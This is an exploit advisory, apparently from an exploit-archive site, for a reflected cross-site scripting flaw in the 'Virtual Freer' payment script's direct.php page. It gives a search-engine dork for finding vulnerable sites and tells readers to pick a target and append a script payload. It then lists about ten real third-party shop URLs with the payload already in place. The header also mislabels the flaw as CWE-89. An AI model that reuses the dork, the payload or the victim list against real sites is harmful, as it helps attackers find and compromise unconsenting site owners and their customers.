Virtual Freer Cross Site Scripting

2016.01.27
Credit: R4SOUL
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

############In The Name Of God############ # Exploit Title : Virtual Freer Cross Site Scripting # Exploit Author : R4SOUL # Vendor Homepage : http://freer.ir/ # Google Dork : site:.ir inurl:direct.php?card= # Date: 2016 26 January # Tested On : Win 10 / Mozilla Firefox ########################################### # Exploit: # Search dork and choose a target and add "'"<script>alert('R4SOUL')</script>" after URL! # To see Vulnerability! ########################################### # # demos : # http://inet2.ir/direct.php?card=9&qty=1'"<script>alert('R4SOUL')</script> # http://www.milanvpn50.tk/boy/direct.php?qty=1'"<script>alert('R4SOUL')</script>&card=16 # http://www.nextvpn.in/pay/direct.php?card=2&qty=1'"<script>alert('R4SOUL')</script> # http://pay.freer.ir/direct.php?card=5&qty=1'"<script>alert('R4SOUL')</script> # http://www.sabzandishan.ir/shop/direct.php?card=64&qty=1'"<script>alert('R4SOUL')</script> # http://shop.mihannod.ir/direct.php?card=15&qty=1'"<script>alert('R4SOUL')</script> # http://www.nextvpn.in/pay/direct.php?card=2&qty=1'"<script>alert('R4SOUL')</script> # http://store.parseset.ir/direct.php?card=3&qty=1'"<script>alert('R4SOUL')</script> # http://www.keriomaker020.in/buy/direct.php?card=1&qty=1'"<script>alert('R4SOUL')</script> # http://tx166.ir/shop/direct.php?card=25&qty=1%27%22%3Cscript%3Ealert(%27R4SOUL%27)%3C/script%3E ###########################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top